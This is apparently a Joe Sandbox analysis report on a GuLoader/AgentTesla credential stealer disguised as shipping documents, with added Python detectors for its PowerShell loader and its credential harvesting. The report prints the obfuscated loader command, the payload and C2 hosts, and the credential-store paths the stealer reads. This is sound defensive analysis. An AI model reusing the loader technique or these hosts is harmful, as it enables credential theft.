            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
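The PowerShell command line recorded above hides which cmdlet actually runs: the staged file is read with Get-Content, a three-character slice at a fixed offset of that content becomes the command name, and the dot operator invokes it with the whole file as its argument, so the command line never contains the word a keyword filter would look for, and the variable names and offset change from sample to sample. The following Python is an added example written for this page, not code from the Joe Sandbox report or from the sample: it parses a process-creation command line for that substring-to-command indirection, recovers the file, offset and length, and, when the referenced file's text is available, resolves the characters it would execute. The report does not show the contents of Tarsometatarsal.Pla, so SAMPLE_SCRIPT is constructed filler and the assumption that the slice spells iex is the example's own.

```python
import re

# Command line recorded in the report for the powershell.exe child of the installer.
REPORT_CMDLINE = (
    '"powershell.exe" -windowstyle minimized "$Nanometre76=Get-Content '
    "'C:\\Users\\user\\AppData\\Local\\acneform\\Baroco\\Tarsometatarsal.Pla';"
    '$Hulhedernes=$Nanometre76.SubString(27962,3);.$Hulhedernes($Nanometre76)"'
)

# Constructed stand-in for the staged file: filler up to the report's offset 27962,
# then the three characters the loader turns into a command name (assumed: iex).
SAMPLE_SCRIPT = "# filler ".ljust(27962, "#") + "iex" + ";Write-Host ok"

# Statement 1: $var = Get-Content '<path>'
_GET_CONTENT = re.compile(r"\$(?P<var>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'", re.I)
# Statement 2: $cmd = $var.SubString(<offset>, <length>)
_SUBSTRING = re.compile(
    r"\$(?P<cmd>\w+)\s*=\s*\$(?P<src>\w+)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)",
    re.I)
# Statement 3: .$cmd($arg) or &$cmd($arg), the dot/call operator applied to a
# variable that holds a command name rather than to a literal command.
_INVOKE = re.compile(r"[.&]\s*\$(?P<cmd>\w+)\s*\(\s*\$(?P<arg>\w+)\s*\)")


def analyse_loader_cmdline(cmdline):
    """Return {"script_path", "offset", "length"} when the command line reads a file,
    slices a command name out of it and invokes that name on the file content.
    The three statements must be linked through the same variables; otherwise None."""
    gc, ss, inv = (_GET_CONTENT.search(cmdline), _SUBSTRING.search(cmdline),
                   _INVOKE.search(cmdline))
    if not (gc and ss and inv):
        return None
    linked = (ss.group("src") == gc.group("var")
              and inv.group("cmd") == ss.group("cmd")
              and inv.group("arg") == gc.group("var"))
    if not linked:
        return None
    return {"script_path": gc.group("path"),
            "offset": int(ss.group("off")),
            "length": int(ss.group("len"))}


def resolve_hidden_command(script_text, offset, length):
    """The characters the loader would use as the command name."""
    return script_text[offset:offset + length]


def triage(cmdline, script_text=None):
    """Verdict for one process-creation event. If the staged file was recovered,
    also report the resolved command and whether it executes the file content."""
    chain = analyse_loader_cmdline(cmdline)
    if chain is None:
        return {"suspicious": False}
    result = {"suspicious": True, **chain,
              "hidden_command": None, "executes_file_content": None}
    if script_text is not None:
        cmd = resolve_hidden_command(script_text, chain["offset"], chain["length"])
        result["hidden_command"] = cmd
        result["executes_file_content"] = cmd.lower() in ("iex", "invoke-expression")
    return result


if __name__ == "__main__":
    print(triage(REPORT_CMDLINE, SAMPLE_SCRIPT))
```

In production the command line comes from process-creation telemetry (Security event 4688 with command-line auditing, or Sysmon event 1); the parser needs only the string. Matching on the shape of the three linked statements is more durable than matching on the random identifiers or the offset, both of which the loader can vary per build.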

            Stealing of Sensitive Information

Source: Yara match; File source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (3 occurrences)
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match; File source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR
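The file and registry accesses listed above are the stealer's inventory pass: one process, a Windows Mail helper that the PowerShell stage wrote into, opens the saved-login stores of several browsers, mail clients and FTP tools in quick succession. The process name is a poor detection key, since wabmig.exe is a legitimate component that lives under Program Files (x86)\Windows Mail; what identifies the behaviour is a single process reading secrets from unrelated application families. The following Python is an added example written for this page, not the sandbox's or the malware's code: it parses the report's own "File opened" / "Key opened" lines, maps each target to a credential-store family using a catalogue whose categories and descriptions are this example's own labelling, and flags any process that touches two or more families. The chrome.exe control line is constructed.

```python
import re
from collections import defaultdict

# Behaviour lines copied from the report's "Stealing of Sensitive Information"
# section (Thunderbird appears three times there; listed once here).
REPORT_LINES = [
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\FTP Navigator\Ftplist.txt",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities",
]

# Constructed control: a browser reading its own password database is normal.
BENIGN_LINES = [
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]

# Credential-store catalogue: (regex over the opened path or key, family, description).
# Families and descriptions are this example's labelling, not the sandbox's.
CREDENTIAL_STORES = [
    (r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.+\\Login Data$", "browser", "Chromium saved logins"),
    (r"\\(Mozilla\\Firefox|8pecxstudios\\Cyberfox|NETGATE Technologies\\BlackHawk)\\profiles\.ini$", "browser", "Gecko profile index"),
    (r"\\Thunderbird\\profiles\.ini$", "mail", "Thunderbird profile index"),
    (r"\\Windows Messaging Subsystem\\Profiles$", "mail", "Outlook/MAPI profiles"),
    (r"\\IncrediMail\\Identities$", "mail", "IncrediMail identities"),
    (r"\\WinSCP 2\\Sessions$", "ftp", "WinSCP saved sessions"),
    (r"^C:\\FTP Navigator\\Ftplist\.txt$", "ftp", "FTP Navigator site list"),
]

# Tolerates the report's fused form ("wabmig.exeFile opened:") as well as spaced lines.
_LINE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.exe)\s*(?P<op>File opened|Key opened):\s*(?P<target>.+)$", re.I)


def parse_line(line):
    """Split one sandbox behaviour line into process, operation and target, or None."""
    m = _LINE.match(line.strip())
    return m.groupdict() if m else None


def classify(target):
    """Return (family, description) for a known credential store, else None."""
    for pattern, family, description in CREDENTIAL_STORES:
        if re.search(pattern, target, re.I):
            return family, description
    return None


def summarise(lines):
    """Per process: the credential-store families and the individual stores it touched."""
    per_proc = defaultdict(lambda: {"categories": set(), "stores": []})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec["target"])
        if hit is None:
            continue
        family, description = hit
        per_proc[rec["proc"]]["categories"].add(family)
        per_proc[rec["proc"]]["stores"].append(description)
    return dict(per_proc)


def flag_harvesters(lines, min_families=2):
    """A process reading saved secrets of two or more unrelated application families
    is the stealer pattern; one application reading its own store is not."""
    return {proc: s for proc, s in summarise(lines).items()
            if len(s["categories"]) >= min_families}


if __name__ == "__main__":
    for proc, s in flag_harvesters(REPORT_LINES + BENIGN_LINES).items():
        print(proc, sorted(s["categories"]), len(s["stores"]), "stores")
```

The same logic applies to EDR file-open and registry telemetry once the process image and target path are extracted; the catalogue is the part to maintain, and the families should follow the applications deployed in the environment rather than this sample's list.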

            Remote Access Functionality

Source: Yara match; File source: 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.3394310610.00000000241A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: wabmig.exe PID: 4232, type: MEMORYSTR
MITRE ATT&CK matrix (a leading number marks a technique with matching signatures, as rendered in the report):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 3 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 Obfuscated Files or Information | 1 Credentials in Registry | 126 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 111 Process Injection | 1 Software Packing | Security Account Manager | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1518330
Sample: Shipping documents 000022999878999800009999.exe
Start date: 25/09/2024
Architecture: WINDOWS
Score: 100

Process tree (node numbers as in the graph; the figures after a process name are the per-process counts shown in the graph):

[2] Start
    DNS/IP: ftp.concaribe.com, concaribe.com, api.ipify.org
    Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 7 other signatures
    started: [8]
[8] Shipping documents 000022999878999800009999.exe (1, 29)
    Dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32)
    started: [11]
[11] powershell.exe (20)
    Dropped: Shipping documents...878999800009999.exe (PE32); Shipping documents...exe:Zone.Identifier (ASCII)
    Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
    started: [15], [19]
[15] wabmig.exe (15, 8)
    Network: concaribe.com 192.185.13.234, remote port 21, local port 49722, UNIFIEDLAYER-AS-1US, United States
    Network: 185.29.11.53, remote port 80, local port 49720, DATACLUB-NL, European Union
    Network: api.ipify.org 104.26.13.205, remote port 443, local port 49721, CLOUDFLARENETUS, United States
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
[19] conhost.exe

Source | Detection | Scanner | Label
Shipping documents 000022999878999800009999.exe | 26% | ReversingLabs | Win32.Trojan.Guloader

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\acneform\Baroco\Shipping documents 000022999878999800009999.exe | 26% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://185.29.11.53/bgJJbKBK219.bin- | 0% | Avira URL Cloud | safe
https://go.micXO | 0% | Avira URL Cloud | safe
http://crl.micro | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://185.29.11.53/bgJJbKBK219.bine | 0% | Avira URL Cloud | safe
http://185.29.11.53/bgJJbKBK219.bin | 0% | Avira URL Cloud | safe
http://concaribe.com | 0% | Avira URL Cloud | safe
http://ftp.concaribe.com | 100% | Avira URL Cloud | malware
https://api.ipify.org/t | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.13.205 | true | false | | unknown
concaribe.com | 192.185.13.234 | true | true | | unknown
ftp.concaribe.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
http://185.29.11.53/bgJJbKBK219.bin | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://go.micXO | powershell.exe, 00000002.00000002.2775532254.0000000006D12000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.11.53/bgJJbKBK219.bin- | wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.micro | powershell.exe, 00000002.00000002.2768740707.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2775532254.0000000006C59000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.11.53/bgJJbKBK219.bine | wabmig.exe, 00000008.00000002.3381693291.0000000008713000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2773945564.0000000005916000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ftp.concaribe.com | wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | Shipping documents 000022999878999800009999.exe, 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Shipping documents 000022999878999800009999.exe, 00000000.00000000.2125866362.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
http://concaribe.com | wabmig.exe, 00000008.00000002.3394310610.00000000241CC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2770069305.00000000048B1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000008.00000002.3394310610.0000000024151000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2770069305.0000000004A06000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.29.11.53 | unknown | European Union | 203557 | DATACLUB-NL | false
104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
192.185.13.234 | concaribe.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1518330
Start date and time: 2024-09-25 15:58:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Shipping documents 000022999878999800009999.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/12@2/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 97%
                  • Number of executed functions: 140
                  • Number of non-executed functions: 30
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 5008 because it is empty
                  • Execution Graph export aborted for target wabmig.exe, PID 4232 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Shipping documents 000022999878999800009999.exe
Time | Type | Description
09:59:03 | API Interceptor | 39x Sleep call for process: powershell.exe modified
10:00:09 | API Interceptor | 55621x Sleep call for process: wabmig.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.29.11.53 | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader | 185.29.11.53/bIGuEflfnZjESw74.bin
185.29.11.53 | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 185.29.11.53/bIGuEflfnZjESw74.bin
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Vidar | api.ipify.org/
104.26.13.205 | fptlVDDPkS.dll | malicious | Quasar | api.ipify.org/
104.26.13.205 | vstdlib_s64.dll.dll | malicious | Quasar | api.ipify.org/
104.26.13.205 | vstdlib_s64.dll.dll | malicious | Quasar | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe | malicious | Unknown | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | z38PO_20248099-1_pdf.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | z64MT103_126021720924_pdf.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | Ze1Ueabtx5.img | malicious | AgentTesla, GuLoader | 172.67.74.152
api.ipify.org | Documenti di spedizione 0009333000459595995.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
api.ipify.org | rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | Zoom_Invite.call-660194855683.wsf | malicious | XWorm | 104.26.12.205
api.ipify.org | reported_account_violation-pdf-67223451.wsf | malicious | XWorm | 104.26.13.205
api.ipify.org | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.html | malicious | Greatness Phishing Kit, HTMLPhisher | 104.26.12.205
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | EFT Remittance - 25_09_24 Ref_3c70ac202caa933179b3568afa512866a7bd5171.eml | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | rLegalOpinionCopy_doc.cmd | malicious | VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | cargo details.exe | malicious | Snake Keylogger | 188.114.96.3
CLOUDFLARENETUS | update.ps1 | malicious | NetSupport RAT, HTMLPhisher | 104.21.73.126
